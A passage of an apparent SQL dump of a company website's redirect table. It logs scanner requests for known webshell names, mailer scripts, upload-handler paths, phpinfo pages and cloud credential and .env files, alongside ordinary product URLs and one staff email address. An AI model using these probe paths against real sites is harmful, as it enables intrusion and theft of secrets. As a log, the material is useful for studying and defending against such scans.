00:00:00',301),(28538,'https://3s-technologies.com.tr/tr/e.php',NULL,'','',3,0,'2022-02-27 03:09:12','0000-00-00 00:00:00',301),(28539,'https://3s-technologies.com.tr/tr/r.php',NULL,'','',3,0,'2022-02-27 03:09:12','0000-00-00 00:00:00',301),(28540,'https://3s-technologies.com.tr/tr/t.php',NULL,'','',2,0,'2022-02-27 03:09:13','0000-00-00 00:00:00',301),(28541,'https://3s-technologies.com.tr/tr/y.php',NULL,'','',3,0,'2022-02-27 03:09:14','0000-00-00 00:00:00',301),(28542,'https://3s-technologies.com.tr/tr/u.php',NULL,'','',3,0,'2022-02-27 03:09:15','0000-00-00 00:00:00',301),(28543,'https://3s-technologies.com.tr/tr/i.php',NULL,'','',3,0,'2022-02-27 03:09:15','0000-00-00 00:00:00',301),(28544,'https://3s-technologies.com.tr/tr/o.php',NULL,'','',3,0,'2022-02-27 03:09:16','0000-00-00 00:00:00',301),(28545,'https://3s-technologies.com.tr/tr/p.php',NULL,'','',3,0,'2022-02-27 03:09:16','0000-00-00 00:00:00',301),(28546,'https://3s-technologies.com.tr/tr/q.php',NULL,'','',2,0,'2022-02-27 03:09:17','0000-00-00 00:00:00',301),(28547,'https://3s-technologies.com.tr/tr/s.php',NULL,'','',2,0,'2022-02-27 03:09:18','0000-00-00 00:00:00',301),(28548,'https://3s-technologies.com.tr/tr/d.php',NULL,'','',1,0,'2022-02-27 03:09:18','0000-00-00 00:00:00',301),(28549,'https://3s-technologies.com.tr/tr/f.php',NULL,'','',3,0,'2022-02-27 03:09:19','0000-00-00 00:00:00',301),(28550,'https://3s-technologies.com.tr/tr/g.php',NULL,'','',1,0,'2022-02-27 03:09:20','0000-00-00 00:00:00',301),(28551,'https://3s-technologies.com.tr/tr/h.php',NULL,'','',3,0,'2022-02-27 03:09:20','0000-00-00 00:00:00',301),(28552,'https://3s-technologies.com.tr/tr/j.php',NULL,'','',1,0,'2022-02-27 03:09:21','0000-00-00 00:00:00',301),(28553,'https://3s-technologies.com.tr/tr/k.php',NULL,'','',4,0,'2022-02-27 03:09:22','0000-00-00 00:00:00',301),(28554,'https://3s-technologies.com.tr/tr/l.php',NULL,'','',2,0,'2022-02-27 03:09:22','0000-00-00 00:00:00',301),(28555,'https://3s-technologies.com.tr/tr/w.php',NULL,'','',3,0,'2022-02-27 03:09:24','0000-00-00 00:00:00',301),(28556,'https://3s-technologies.com.tr/tr/c.php',NULL,'','',6,0,'2022-02-27 03:09:25','0000-00-00 00:00:00',301),(28557,'https://3s-technologies.com.tr/tr/v.php',NULL,'','',2,0,'2022-02-27 03:09:26','0000-00-00 00:00:00',301),(28558,'https://3s-technologies.com.tr/tr/b.php',NULL,'','',3,0,'2022-02-27 03:09:27','0000-00-00 00:00:00',301),(28559,'https://3s-technologies.com.tr/tr/n.php',NULL,'','',1,0,'2022-02-27 03:09:27','0000-00-00 00:00:00',301),(28560,'https://3s-technologies.com.tr/tr/new-index.php',NULL,'','',2,0,'2022-02-27 03:09:28','0000-00-00 00:00:00',301),(28561,'https://3s-technologies.com.tr/tr/old-index.php',NULL,'','',3,0,'2022-02-27 03:09:29','0000-00-00 00:00:00',301),(28562,'https://3s-technologies.com.tr/tr/sendemail.php',NULL,'','',2,0,'2022-02-27 03:09:29','0000-00-00 00:00:00',301),(28563,'https://3s-technologies.com.tr/tr/kindex.php',NULL,'','',3,0,'2022-02-27 03:09:32','0000-00-00 00:00:00',301),(28564,'https://3s-technologies.com.tr/tr/cpanel.php',NULL,'','',3,0,'2022-02-27 03:09:33','0000-00-00 00:00:00',301),(28565,'https://3s-technologies.com.tr/tr/cp.php',NULL,'','',1,0,'2022-02-27 03:09:34','0000-00-00 00:00:00',301),(28566,'https://3s-technologies.com.tr/tr/mar.php',NULL,'','',5,0,'2022-02-27 03:09:36','0000-00-00 00:00:00',301),(28567,'https://3s-technologies.com.tr/tr/sym403.php',NULL,'','',3,0,'2022-02-27 03:09:37','0000-00-00 00:00:00',301),(28568,'https://3s-technologies.com.tr/tr/content.php',NULL,'','',3,0,'2022-02-27 03:09:38','0000-00-00 00:00:00',301),(28569,'https://3s-technologies.com.tr/tr/foxwsov1.php',NULL,'','',2,0,'2022-02-27 03:09:40','0000-00-00 00:00:00',301),(28570,'https://3s-technologies.com.tr/tr/alf.php',NULL,'','',3,0,'2022-02-27 03:09:42','0000-00-00 00:00:00',301),(28571,'https://3s-technologies.com.tr/tr/xox.php',NULL,'','',3,0,'2022-02-27 03:09:54','0000-00-00 00:00:00',301),(28572,'https://3s-technologies.com.tr/tr/xo.php',NULL,'','',2,0,'2022-02-27 03:09:55','0000-00-00 00:00:00',301),(28573,'https://3s-technologies.com.tr/tr/mi.php',NULL,'','',2,0,'2022-02-27 03:09:56','0000-00-00 00:00:00',301),(28574,'https://3s-technologies.com.tr/tr/!.php',NULL,'','',1,0,'2022-02-27 03:09:57','0000-00-00 00:00:00',301),(28575,'https://3s-technologies.com.tr/tr/alexusmailer 2.0.php',NULL,'','',1,0,'2022-02-27 03:09:58','0000-00-00 00:00:00',301),(28576,'https://3s-technologies.com.tr/tr/rss.php',NULL,'','',2,0,'2022-02-27 03:09:58','0000-00-00 00:00:00',301),(28577,'https://3s-technologies.com.tr/tr/alwso.php',NULL,'','',2,0,'2022-02-27 03:10:00','0000-00-00 00:00:00',301),(28578,'https://3s-technologies.com.tr/tr/wp-content/includes/uploads/va.php',NULL,'','',1,0,'2022-02-27 03:10:01','0000-00-00 00:00:00',301),(28579,'https://3s-technologies.com.tr/tr/wp-content/uploads/readindex.php',NULL,'','',1,0,'2022-02-27 03:10:02','0000-00-00 00:00:00',301),(28580,'https://3s-technologies.com.tr/tr/wp-content/uploads/small.php',NULL,'','',1,0,'2022-02-27 03:10:03','0000-00-00 00:00:00',301),(28581,'https://3s-technologies.com.tr/tr/wp-admin/includes/mar.php',NULL,'','',1,0,'2022-02-27 03:10:03','0000-00-00 00:00:00',301),(28582,'https://3s-technologies.com.tr/tr/wp-admin/includes/readindex.php',NULL,'','',1,0,'2022-02-27 03:10:04','0000-00-00 00:00:00',301),(28583,'https://3s-technologies.com.tr/tr/wp-admin/includes/maint/wp-readindex.php',NULL,'','',1,0,'2022-02-27 03:10:05','0000-00-00 00:00:00',301),(28584,'https://3s-technologies.com.tr/tr/wp-admin/includes/maint/wp-cron.php',NULL,'','',1,0,'2022-02-27 03:10:05','0000-00-00 00:00:00',301),(28585,'https://3s-technologies.com.tr/tr/wp-admin/includes/media-site.php',NULL,'','',1,0,'2022-02-27 03:10:06','0000-00-00 00:00:00',301),(28586,'https://3s-technologies.com.tr/tr/wp-admin/includes/class-wp-media-list-data.php',NULL,'','',1,0,'2022-02-27 03:10:06','0000-00-00 00:00:00',301),(28587,'https://3s-technologies.com.tr/tr/wp-admin/includes/maint/repair-bak.php',NULL,'','',1,0,'2022-02-27 03:10:07','0000-00-00 00:00:00',301),(28588,'https://3s-technologies.com.tr/tr/wp-admin/includes/edit-tag-menu.php',NULL,'','',1,0,'2022-02-27 03:10:08','0000-00-00 00:00:00',301),(28589,'https://3s-technologies.com.tr/tr/wp-admin/includes/tablepress_controllers.php',NULL,'','',1,0,'2022-02-27 03:10:09','0000-00-00 00:00:00',301),(28590,'https://3s-technologies.com.tr/tr/wp-admin/includes/block-line.php',NULL,'','',1,0,'2022-02-27 03:10:09','0000-00-00 00:00:00',301),(28591,'https://3s-technologies.com.tr/tr/wp-admin/css/modern/colors.css.php',NULL,'','',1,0,'2022-02-27 03:10:10','0000-00-00 00:00:00',301),(28592,'https://3s-technologies.com.tr/tr/wp-includes/sys.php',NULL,'','',1,0,'2022-02-27 03:10:11','0000-00-00 00:00:00',301),(28593,'https://3s-technologies.com.tr/tr/hello.php',NULL,'','',1,0,'2022-02-27 03:10:13','0000-00-00 00:00:00',301),(28594,'https://3s-technologies.com.tr/tr/fa.php',NULL,'','',1,0,'2022-02-27 03:10:13','0000-00-00 00:00:00',301),(28595,'https://3s-technologies.com.tr/tr/alexus-mailer.php',NULL,'','',1,0,'2022-02-27 03:10:14','0000-00-00 00:00:00',301),(28596,'https://3s-technologies.com.tr/tr/mini.php',NULL,'','',8,0,'2022-02-27 03:10:17','0000-00-00 00:00:00',301),(28597,'https://3s-technologies.com.tr/tr/wp-ad.php',NULL,'','',1,0,'2022-02-27 03:10:18','0000-00-00 00:00:00',301),(28598,'https://3s-technologies.com.tr/tr/wp-file.php',NULL,'','',1,0,'2022-02-27 03:10:18','0000-00-00 00:00:00',301),(28599,'https://3s-technologies.com.tr/tr/ok.php',NULL,'','',1,0,'2022-02-27 03:10:19','0000-00-00 00:00:00',301),(28600,'https://3s-technologies.com.tr/tr/wso2.php',NULL,'','',1,0,'2022-02-27 03:10:20','0000-00-00 00:00:00',301),(28601,'https://3s-technologies.com.tr/tr/kk.php',NULL,'','',1,0,'2022-02-27 03:10:21','0000-00-00 00:00:00',301),(28602,'https://3s-technologies.com.tr/tr/anone.php',NULL,'','',2,0,'2022-02-27 03:10:28','0000-00-00 00:00:00',301),(28603,'https://3s-technologies.com.tr/tr/wp-configer.php',NULL,'','',1,0,'2022-02-27 03:10:29','0000-00-00 00:00:00',301),(28604,'https://3s-technologies.com.tr/tr/wp-rss.php',NULL,'','',2,0,'2022-02-27 03:10:33','0000-00-00 00:00:00',301),(28605,'https://3s-technologies.com.tr/tr/.wp-cache.php',NULL,'','',1,0,'2022-02-27 03:10:34','0000-00-00 00:00:00',301),(28606,'https://3s-technologies.com.tr/tr/sendmail.php',NULL,'','',1,0,'2022-02-27 03:10:34','0000-00-00 00:00:00',301),(28607,'https://3s-technologies.com.tr/tr/wp/rahma.php',NULL,'','',1,0,'2022-02-27 03:10:35','0000-00-00 00:00:00',301),(28608,'https://3s-technologies.com.tr/tr/rahma.php',NULL,'','',1,0,'2022-02-27 03:10:35','0000-00-00 00:00:00',301),(28609,'https://3s-technologies.com.tr/tr/nasgor.php',NULL,'','',1,0,'2022-02-27 03:10:36','0000-00-00 00:00:00',301),(28610,'https://3s-technologies.com.tr/tr/sym.php',NULL,'','',1,0,'2022-02-27 03:10:38','0000-00-00 00:00:00',301),(28611,'https://3s-technologies.com.tr/tr/wp-confirm.php',NULL,'','',1,0,'2022-02-27 03:10:38','0000-00-00 00:00:00',301),(28612,'https://3s-technologies.com.tr/tr/alfa123.php',NULL,'','',2,0,'2022-02-27 03:10:39','0000-00-00 00:00:00',301),(28613,'https://3s-technologies.com.tr/tr/dr.php',NULL,'','',1,0,'2022-02-27 03:10:39','0000-00-00 00:00:00',301),(28614,'https://3s-technologies.com.tr/tr/bypass.php',NULL,'','',4,0,'2022-02-27 03:10:40','0000-00-00 00:00:00',301),(28615,'https://3s-technologies.com.tr/tr/wp-blog.php',NULL,'','',5,0,'2022-02-27 03:10:40','0000-00-00 00:00:00',301),(28616,'https://3s-technologies.com.tr/tr/data.php',NULL,'','',5,0,'2022-02-27 03:10:43','0000-00-00 00:00:00',301),(28617,'https://3s-technologies.com.tr/tr/wp-one.php',NULL,'','',1,0,'2022-02-27 03:10:43','0000-00-00 00:00:00',301),(28618,'https://3s-technologies.com.tr/tr/wso1337.php',NULL,'','',2,0,'2022-02-27 03:10:45','0000-00-00 00:00:00',301),(28619,'https://3s-technologies.com.tr/tr/www.php',NULL,'','',2,0,'2022-02-27 03:10:46','0000-00-00 00:00:00',301),(28620,'https://3s-technologies.com.tr/tr/uploads/contexmini.php',NULL,'','',1,0,'2022-02-27 03:10:47','0000-00-00 00:00:00',301),(28621,'https://3s-technologies.com.tr/tr/blog.php',NULL,'','',1,0,'2022-02-27 03:10:47','0000-00-00 00:00:00',301),(28622,'https://3s-technologies.com.tr/tr/it.php',NULL,'','',1,0,'2022-02-27 03:10:48','0000-00-00 00:00:00',301),(28623,'https://3s-technologies.com.tr/tr/kiss.php',NULL,'','',3,0,'2022-02-27 03:10:49','0000-00-00 00:00:00',301),(28624,'https://3s-technologies.com.tr/tr/wp2.php',NULL,'','',1,0,'2022-02-27 03:10:50','0000-00-00 00:00:00',301),(28625,'https://3s-technologies.com.tr/tr/symlink.php',NULL,'','',3,0,'2022-02-27 03:10:52','0000-00-00 00:00:00',301),(28626,'https://3s-technologies.com.tr/tr/ohayo.php',NULL,'','',1,0,'2022-02-27 03:10:53','0000-00-00 00:00:00',301),(28627,'https://3s-technologies.com.tr/tr/777.php',NULL,'','',2,0,'2022-02-27 03:10:54','0000-00-00 00:00:00',301),(28628,'https://3s-technologies.com.tr/tr/wp-content/wp-logins.php',NULL,'','',1,0,'2022-02-27 03:10:55','0000-00-00 00:00:00',301),(28629,'https://3s-technologies.com.tr/tr/wp-content/wp-admin.php',NULL,'','',1,0,'2022-02-27 03:10:57','0000-00-00 00:00:00',301),(28630,'https://3s-technologies.com.tr/tr/foxwso.php',NULL,'','',3,0,'2022-02-27 03:11:01','0000-00-00 00:00:00',301),(28631,'https://3s-technologies.com.tr/tr/cms.php',NULL,'','',2,0,'2022-02-27 03:11:02','0000-00-00 00:00:00',301),(28632,'https://3s-technologies.com.tr/tr/stindex.php',NULL,'','',3,0,'2022-02-27 03:11:03','0000-00-00 00:00:00',301),(28633,'https://3s-technologies.com.tr/tr/wp-uploads.php',NULL,'','',1,0,'2022-02-27 03:11:04','0000-00-00 00:00:00',301),(28634,'https://3s-technologies.com.tr/tr/autoload_classmap.php',NULL,'','',5,0,'2022-02-27 03:11:04','0000-00-00 00:00:00',301),(28635,'https://3s-technologies.com.tr/tr/gel.php',NULL,'','',2,0,'2022-02-27 03:11:05','0000-00-00 00:00:00',301),(28636,'https://3s-technologies.com.tr/tr/defau1t.php',NULL,'','',2,0,'2022-02-27 03:11:05','0000-00-00 00:00:00',301),(28637,'https://3s-technologies.com.tr/tr/0byte.php',NULL,'','',2,0,'2022-02-27 03:11:06','0000-00-00 00:00:00',301),(28638,'https://3s-technologies.com.tr/tr/.fk.php',NULL,'','',1,0,'2022-02-27 03:11:10','0000-00-00 00:00:00',301),(28639,'https://3s-technologies.com.tr/tr/sindex.php',NULL,'','',1,0,'2022-02-27 03:11:13','0000-00-00 00:00:00',301),(28640,'https://3s-technologies.com.tr/tr/baindex.php',NULL,'','',2,0,'2022-02-27 03:11:14','0000-00-00 00:00:00',301),(28641,'https://3s-technologies.com.tr/tr/wi.php',NULL,'','',2,0,'2022-02-27 03:11:15','0000-00-00 00:00:00',301),(28642,'http://3s-technologies.com.tr/tr/theme/assets/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',6,0,'2022-02-27 04:49:38','0000-00-00 00:00:00',301),(28643,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/by,product_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-02-27 07:49:28','0000-00-00 00:00:00',301),(28644,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lazer-markalama/lps-c-detail',NULL,'','',1,0,'2022-02-27 16:09:47','0000-00-00 00:00:00',301),(28645,'https://3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-33-detail',NULL,'','',3,0,'2022-02-27 17:19:34','0000-00-00 00:00:00',301),(28646,'http://3s-technologies.com.tr/tr/theme/assets/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-02-28 16:37:12','0000-00-00 00:00:00',301),(28647,'https://3s-technologies.com.tr/tr/fewe.php',NULL,'','',1,0,'2022-02-28 16:41:19','0000-00-00 00:00:00',301),(28648,'https://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/perl.alfa',NULL,'','',1,0,'2022-02-28 16:41:25','0000-00-00 00:00:00',301),(28649,'https://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/mini.php',NULL,'','',1,0,'2022-02-28 16:41:26','0000-00-00 00:00:00',301),(28650,'https://3s-technologies.com.tr/tr/dkiz.php',NULL,'','',1,0,'2022-02-28 16:41:26','0000-00-00 00:00:00',301),(28651,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/tolo/smd-fä±rä±n?language=tr-tr&keyword=',NULL,'','',11,0,'2022-02-28 19:12:53','0000-00-00 00:00:00',301),(28652,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/manufacturer/ddm-novastar/screen-printer/dirdesc?language=tr-tr&keyword=',NULL,'','',1,0,'2022-02-28 20:21:43','0000-00-00 00:00:00',301),(28653,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-fä±rä±n/by,category_name?language=tr-tr&keyword=',NULL,'','',2,0,'2022-03-01 12:41:51','0000-00-00 00:00:00',301),(28654,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-42-detail',NULL,'','',1,0,'2022-03-01 15:03:49','0000-00-00 00:00:00',301),(28655,'http://3s-technologies.com.tr/tr/admin/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',10,0,'2022-03-02 04:19:02','0000-00-00 00:00:00',301),(28656,'https://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_sku?language=tr-tr',NULL,'','',1,0,'2022-03-02 17:34:20','0000-00-00 00:00:00',301),(28657,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spg-detail',NULL,'','',1,0,'2022-03-03 07:58:18','0000-00-00 00:00:00',301),(28658,'http://3s-technologies.com.tr/_profiler/phpinfo',NULL,'','',1,0,'2022-03-03 20:57:09','0000-00-00 00:00:00',301),(28659,'https://3s-technologies.com.tr/_profiler/phpinfo',NULL,'','',1,0,'2022-03-03 20:57:09','0000-00-00 00:00:00',301),(28660,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/ess-310-detail',NULL,'','',2,0,'2022-03-04 02:32:42','0000-00-00 00:00:00',301),(28661,'http://3s-technologies.com.tr/tr/auto-seo.php',NULL,'','',2,0,'2022-03-04 03:04:41','0000-00-00 00:00:00',301),(28662,'http://3s-technologies.com.tr/tr/wp-2019.php',NULL,'','',193,0,'2022-03-04 03:04:41','0000-00-00 00:00:00',301),(28663,'http://3s-technologies.com.tr/tr/alwso.php',NULL,'','',46,0,'2022-03-04 03:04:43','0000-00-00 00:00:00',301),(28664,'http://3s-technologies.com.tr/tr/wp-fox.php',NULL,'','',5,0,'2022-03-04 03:04:43','0000-00-00 00:00:00',301),(28665,'http://3s-technologies.com.tr/tr/xx.php',NULL,'','',264,0,'2022-03-04 03:04:43','0000-00-00 00:00:00',301),(28666,'http://3s-technologies.com.tr/tr/autoload_classmap.php',NULL,'','',507,0,'2022-03-04 03:04:45','0000-00-00 00:00:00',301),(28667,'http://3s-technologies.com.tr/tr/ã¼rã¼nler/bã¶lgesel-lehimleme/ess-310-24-detail',NULL,'','',1,0,'2022-03-04 12:57:23','0000-00-00 00:00:00',301),(28668,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z/npm-w2s-detail',NULL,'','',1,0,'2022-03-04 19:37:47','0000-00-00 00:00:00',301),(28669,'http://mail.3s-technologies.com.tr/tr/bc',NULL,'http://mail.3s-technologies.com.tr/bc','',521,0,'2022-03-06 09:21:06','0000-00-00 00:00:00',301),(28670,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-detail',NULL,'','',1,0,'2022-03-07 07:49:03','0000-00-00 00:00:00',301),(28671,'https://3s-technologies.com.tr/index.php/en/products/245-sn63pb37-0.4mm-29-detail?tmpl=component&print=1',NULL,'','',2,0,'2022-03-07 11:49:24','0000-00-00 00:00:00',301),(28672,'https://3s-technologies.com.tr/tr/.well-known/autoconfig/mail/config-v1.1.xml?emailaddress=sezgin.caliskan@3s-technologies.com.tr',NULL,'','',3,0,'2022-03-08 08:58:14','0000-00-00 00:00:00',301),(28673,'https://3s-technologies.com.tr/tr/.well-known/carddav',NULL,'','',1,0,'2022-03-08 08:58:36','0000-00-00 00:00:00',301),(28674,'https://3s-technologies.com.tr/tr/.well-known/caldav',NULL,'','',1,0,'2022-03-08 08:58:37','0000-00-00 00:00:00',301),(28675,'https://3s-technologies.com.tr/.aws/credentials',NULL,'','',1,0,'2022-03-08 14:57:13','0000-00-00 00:00:00',301),(28676,'http://3s-technologies.com.tr/.aws/credentials',NULL,'','',1,0,'2022-03-08 14:57:13','0000-00-00 00:00:00',301),(28677,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/avf-detail/askquestion?tmpl=component',NULL,'','',3,0,'2022-03-09 02:39:38','0000-00-00 00:00:00',301),(28678,'http://3s-technologies.com.tr/en/wp-admin/includes',NULL,'www.google.com','',84,0,'2022-03-09 09:39:44','0000-00-00 00:00:00',301),(28679,'http://3s-technologies.com.tr/en/wp/wp-admin/includes',NULL,'www.google.com','',1,0,'2022-03-09 09:39:50','0000-00-00 00:00:00',301),(28680,'http://3s-technologies.com.tr/en/wordpress/wp-admin/includes',NULL,'www.google.com','',1,0,'2022-03-09 09:40:00','0000-00-00 00:00:00',301),(28681,'http://3s-technologies.com.tr/en/site/wp-admin/includes',NULL,'www.google.com','',1,0,'2022-03-09 09:40:05','0000-00-00 00:00:00',301),(28682,'http://3s-technologies.com.tr/en/blog/wp-admin/includes',NULL,'www.google.com','',1,0,'2022-03-09 09:40:11','0000-00-00 00:00:00',301),(28683,'http://3s-technologies.com.tr/tr/wp-content/mu-plugins-old/index.php',NULL,'','',13,0,'2022-03-09 15:21:37','0000-00-00 00:00:00',301),(28684,'http://3s-technologies.com.tr/tr/assets/global/plugins/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-10 22:46:52','0000-00-00 00:00:00',301),(28685,'https://3s-technologies.com.tr/index.php/en/products/krem-lehim',NULL,'','',11,0,'2022-03-11 04:00:08','0000-00-00 00:00:00',301),(28686,'http://3s-technologies.com.tr/tr/public/assets/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-11 04:44:15','0000-00-00 00:00:00',301),(28687,'http://3s-technologies.com.tr/tr/xleet-shell.php',NULL,'','',37,0,'2022-03-11 06:38:54','0000-00-00 00:00:00',301),(28688,'http://3s-technologies.com.tr/tr/xleet.php',NULL,'','',114,0,'2022-03-11 06:38:54','0000-00-00 00:00:00',301),(28689,'http://3s-technologies.com.tr/tr/wp-file.php',NULL,'','',131,0,'2022-03-11 06:38:54','0000-00-00 00:00:00',301),(28690,'http://3s-technologies.com.tr/tr/takeout.php',NULL,'','',3,0,'2022-03-11 06:38:54','0000-00-00 00:00:00',301),(28691,'http://3s-technologies.com.tr/tr/jindex.php',NULL,'','',53,0,'2022-03-11 06:38:55','0000-00-00 00:00:00',301),(28692,'http://3s-technologies.com.tr/tr/wp-scripts.php',NULL,'','',5,0,'2022-03-11 06:38:55','0000-00-00 00:00:00',301),(28693,'http://3s-technologies.com.tr/tr/public/plugins/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-11 08:22:42','0000-00-00 00:00:00',301),(28694,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/2-el-makineler/by,mf_name?language=tr-tr&keyword=',NULL,'','',1,0,'2022-03-11 09:33:48','0000-00-00 00:00:00',301),(28695,'http://3s-technologies.com.tr/tr/admin/assets/global/plugins/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-13 02:21:02','0000-00-00 00:00:00',301),(28696,'http://3s-technologies.com.tr/tr/public/admin/assets/plugins/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-03-13 08:20:31','0000-00-00 00:00:00',301),(28697,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer/spr-20-41-detail',NULL,'','',2,0,'2022-03-14 22:31:20','0000-00-00 00:00:00',301),(28698,'http://3s-technologies.com.tr/tr/assets/js/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-03-15 03:21:33','0000-00-00 00:00:00',301),(28699,'http://3s-technologies.com.tr/.aws/.credentials',NULL,'','',1,0,'2022-03-16 09:35:54','0000-00-00 00:00:00',301),(28700,'https://3s-technologies.com.tr/.aws/.credentials',NULL,'','',1,0,'2022-03-16 09:35:56','0000-00-00 00:00:00',301),(28701,'http://3s-technologies.com.tr/tr/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-03-17 05:13:00','0000-00-00 00:00:00',301),(28702,'http://www.3s-technologies.com.tr/en/_profiler/phpinfo',NULL,'','',1,0,'2022-03-18 17:05:29','0000-00-00 00:00:00',301),(28703,'http://www.3s-technologies.com.tr/en/phpinfo.php',NULL,'','',2,0,'2022-03-18 17:05:30','0000-00-00 00:00:00',301),(28704,'http://www.3s-technologies.com.tr/en/phpinfo',NULL,'','',1,0,'2022-03-18 17:05:31','0000-00-00 00:00:00',301),(28705,'http://www.3s-technologies.com.tr/en/aws.yml',NULL,'','',1,0,'2022-03-18 17:05:31','0000-00-00 00:00:00',301),(28706,'http://www.3s-technologies.com.tr/en/.env.bak',NULL,'','',1,0,'2022-03-18 17:05:32','0000-00-00 00:00:00',301),(28707,'http://www.3s-technologies.com.tr/en/info.php',NULL,'','',2,0,'2022-03-18 17:05:33','0000-00-00 00:00:00',301),(28708,'http://www.3s-technologies.com.tr/en/.aws/credentials',NULL,'','',1,0,'2022-03-18 17:05:34','0000-00-00 00:00:00',301),(28709,'http://www.3s-technologies.com.tr/en/config/aws.yml',NULL,'','',1,0,'2022-03-18 17:05:36','0000-00-00 00:00:00',301),(28710,'http://www.3s-technologies.com.tr/en/config.js',NULL,'','',1,0,'2022-03-18 17:05:38','0000-00-00 00:00:00',301),(28711,'http://3s-technologies.com.tr/tr/aluminyum-iåÿleme-aluminum-processing',NULL,'','',3,0,'2022-03-18 17:28:31','0000-00-00 00:00:00',301),(28712,'http://3s-technologies.com.tr/tr/assets/fileupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',4,0,'2022-03-18 18:50:48','0000-00-00 00:00:00',301),(28713,'http://www.3s-technologies.com.tr/tr/bc',NULL,'http://www.3s-technologies.com.tr/bc','',418,0,'2022-03-19 00:25:37','0000-00-00 00:00:00',301),(28714,'https://3s-technologies.com.tr/en/xmlrpc.php',NULL,'','',42,0,'2022-03-19 12:44:41','0000-00-00 00:00:00',301),(28715,'http://3s-technologies.com.tr/tr/shell4.php',NULL,'','',2,0,'2022-03-19 14:56:17','0000-00-00 00:00:00',301),(28716,'http://3s-technologies.com.tr/tr/ru.php',NULL,'','',3,0,'2022-03-19 14:56:18','0000-00-00 00:00:00',301),(28717,'http://3s-technologies.com.tr/tr/if.php',NULL,'','',40,0,'2022-03-19 14:56:20','0000-00-00 00:00:00',301),(28718,'http://3s-technologies.com.tr/tr/skipper.php',NULL,'','',1,0,'2022-03-19 14:56:22','0000-00-00 00:00:00',301),(28719,'http://3s-technologies.com.tr/tr/skippershell.php',NULL,'','',1,0,'2022-03-19 14:56:23','0000-00-00 00:00:00',301),(28720,'http://3s-technologies.com.tr/tr/tttt.php',NULL,'','',1,0,'2022-03-19 14:56:24','0000-00-00 00:00:00',301),(28721,'http://3s-technologies.com.tr/tr/tshop.php',NULL,'','',1,0,'2022-03-19 14:56:26','0000-00-00 00:00:00',301),(28722,'http://3s-technologies.com.tr/tr/inje3ctor.php',NULL,'','',1,0,'2022-03-19 14:56:29','0000-00-00 00:00:00',301),(28723,'http://3s-technologies.com.tr/tr/saudi.php',NULL,'','',1,0,'2022-03-19 14:56:29','0000-00-00 00:00:00',301),(28724,'http://3s-technologies.com.tr/tr/alfashell.php',NULL,'','',81,0,'2022-03-19 14:56:31','0000-00-00 00:00:00',301),(28725,'http://3s-technologies.com.tr/tr/my_alfa.php',NULL,'','',1,0,'2022-03-19 14:56:32','0000-00-00 00:00:00',301),(28726,'http://3s-technologies.com.tr/tr/hacked.php',NULL,'','',2,0,'2022-03-19 14:56:34','0000-00-00 00:00:00',301),(28727,'http://3s-technologies.com.tr/tr/c99.php',NULL,'','',50,0,'2022-03-19 14:56:36','0000-00-00 00:00:00',301),(28728,'http://3s-technologies.com.tr/tr/priv8.php',NULL,'','',52,0,'2022-03-19 14:56:37','0000-00-00 00:00:00',301),(28729,'http://3s-technologies.com.tr/tr/navir.php',NULL,'','',1,0,'2022-03-19 14:56:38','0000-00-00 00:00:00',301),(28730,'http://3s-technologies.com.tr/tr/cmd13.php',NULL,'','',1,0,'2022-03-19 14:56:39','0000-00-00 00:00:00',301),(28731,'http://3s-technologies.com.tr/tr/inc20k1.php',NULL,'','',2,0,'2022-03-19 14:56:40','0000-00-00 00:00:00',301),(28732,'http://3s-technologies.com.tr/tr/swm.php',NULL,'','',16,0,'2022-03-19 14:56:44','0000-00-00 00:00:00',301),(28733,'http://3s-technologies.com.tr/tr/edit-form.php',NULL,'','',35,0,'2022-03-19 14:56:50','0000-00-00 00:00:00',301),(28734,'http://3s-technologies.com.tr/tr/srx.php',NULL,'https://www.google.com','',20,0,'2022-03-19 22:50:01','0000-00-00 00:00:00',301),(28735,'http://3s-technologies.com.tr/tr/1337.php',NULL,'https://www.google.com','',57,0,'2022-03-19 22:50:03','0000-00-00 00:00:00',301),(28736,'http://3s-technologies.com.tr/tr/leaf.php',NULL,'https://www.google.com','',58,0,'2022-03-19 22:50:28','0000-00-00 00:00:00',301),(28737,'http://3s-technologies.com.tr/tr/leafmailer2.8.php',NULL,'https://www.google.com','',23,0,'2022-03-19 22:50:34','0000-00-00 00:00:00',301),(28738,'http://3s-technologies.com.tr/tr/alex.php',NULL,'https://www.google.com','',32,0,'2022-03-19 22:50:39','0000-00-00 00:00:00',301),(28739,'http://3s-technologies.com.tr/tr/new.php',NULL,'https://www.google.com','',222,0,'2022-03-19 22:50:40','0000-00-00 